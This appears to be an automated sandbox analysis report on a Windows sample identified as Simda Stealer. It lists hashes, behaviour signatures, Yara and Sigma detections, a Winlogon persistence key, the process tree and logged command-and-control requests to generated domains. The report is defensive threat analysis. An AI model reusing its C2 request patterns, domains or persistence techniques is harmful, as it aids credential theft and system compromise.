Windows Analysis Report
Z8eHwAvqAh.exe

Overview

General Information

Sample name:Z8eHwAvqAh.exe
renamed because original name is a hash value
Original sample name:281bff88b708e81638f6c4548d0bac897a059c54.exe
Analysis ID:1553825
MD5:3ab620205abe34e0bb0a34c253b30cd7
SHA1:281bff88b708e81638f6c4548d0bac897a059c54
SHA256:8b72b2f58a4fe3d7be31e9bc4b53c8b21bc3410243325d2ac15627419fd051ff
Tags: exe, user-NDA0E

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Z8eHwAvqAh.exe (PID: 7836 cmdline: "C:\Users\user\Desktop\Z8eHwAvqAh.exe" MD5: 3AB620205ABE34E0BB0A34C253B30CD7)
    • svchost.exe (PID: 7908 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 3544C1362497D11F8724B63036038086)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7544 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7520 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7496 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 6700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7472 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 6428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7448 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7428 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7400 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7380 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7352 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7328 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7304 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7268 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • swvGCAxOMikYQeoQzimiprVu.exe (PID: 7232 cmdline: "C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.2140868615.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.2143770562.0000000002700000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.2147781586.0000000002700000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.2140232259.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Source | Rule | Description | Author | Strings
2.3.svchost.exe.2700000.28.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
2.3.svchost.exe.2700000.39.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
2.3.svchost.exe.889400.2.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
2.3.svchost.exe.3eb0000.16.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\Z8eHwAvqAh.exe, ProcessId: 7836, TargetFilename: C:\Windows\apppatch\svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z8eHwAvqAh.exe", ParentImage: C:\Users\user\Desktop\Z8eHwAvqAh.exe, ParentProcessId: 7836, ParentProcessName: Z8eHwAvqAh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7908, ProcessName: svchost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 7908, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z8eHwAvqAh.exe", ParentImage: C:\Users\user\Desktop\Z8eHwAvqAh.exe, ParentProcessId: 7836, ParentProcessName: Z8eHwAvqAh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7908, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z8eHwAvqAh.exe", ParentImage: C:\Users\user\Desktop\Z8eHwAvqAh.exe, ParentProcessId: 7836, ParentProcessName: Z8eHwAvqAh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7908, ProcessName: svchost.exe

AV Detection

Source: Z8eHwAvqAh.exe | Avira: detected
Source: C:\Windows\apppatch\svchost.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: Z8eHwAvqAh.exe | ReversingLabs: Detection: 84%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Windows\apppatch\svchost.exe | Joe Sandbox ML: detected
Source: Z8eHwAvqAh.exe | Joe Sandbox ML: detected

Compliance

Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Unpacked PE file: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.unpack
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe | Unpacked PE file: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.unpack
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe | Unpacked PE file: 1.2.Z8eHwAvqAh.exe.400000.0.unpack
Source: Z8eHwAvqAh.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:64056 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:64058 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:62050 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:62051 version: TLS 1.2
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000002.2167317620.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2059290079.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2061299411.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000012.00000000.2065037016.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000000.2086064782.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000000.2093471617.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2109184378.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000000.2106806222.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000000.2111283138.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2120935619.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2130306173.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2134588404.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2140976598.000000000056E000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_01309910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,22_2_01309910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_0130DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,22_2_0130DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_0130DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,22_2_0130DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012FE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012E7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,22_2_012E7680

Networking

Source: Network traffic Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49736 -> 44.221.84.105:80
Source: Network traffic Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.10:64434
Source: C:\Windows\apppatch\svchost.exe HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345917.6190825
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0425-1706-a2c8-02526792f211 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345917.8924867
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
